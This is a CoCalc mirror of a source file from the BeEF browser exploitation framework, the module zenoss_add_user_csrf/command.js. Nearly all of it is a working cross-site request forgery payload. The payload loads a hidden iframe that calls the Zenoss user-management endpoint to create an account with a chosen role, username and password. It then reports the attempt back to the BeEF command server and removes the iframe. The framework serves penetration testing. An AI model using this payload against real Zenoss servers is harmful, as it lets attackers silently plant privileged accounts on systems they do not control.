Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
beefproject
GitHub Repository: beefproject/beef
Path: blob/master/modules/exploits/zenoss_add_user_csrf/command.js
1154 views
1
//
2
// Copyright (c) 2006-2025 Wade Alcorn - [email protected]
3
// Browser Exploitation Framework (BeEF) - https://beefproject.com
4
// See the file 'doc/COPYING' for copying permission
5
//
6
7
beef.execute(function() {
8
var base = '<%= @base %>';
9
var user_level = '<%= @user_level %>';
10
var username = '<%= @username %>';
11
var password = '<%= @password %>';
12
13
var zenoss_add_user_iframe = beef.dom.createInvisibleIframe();
14
zenoss_add_user_iframe.setAttribute('src', base+'/zport/dmd/ZenUsers?tableName=userlist&zenScreenName=manageUserFolder.pt&manage_addUser%3Amethod=OK&defaultAdminRole='+user_level+'&roles%3Alist='+user_level+'&userid='+username+'&password='+password);
15
16
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
17
18
cleanup = function() {
19
document.body.removeChild(zenoss_add_user_iframe);
20
}
21
setTimeout("cleanup()", 15000);
22
23
});
24
25
26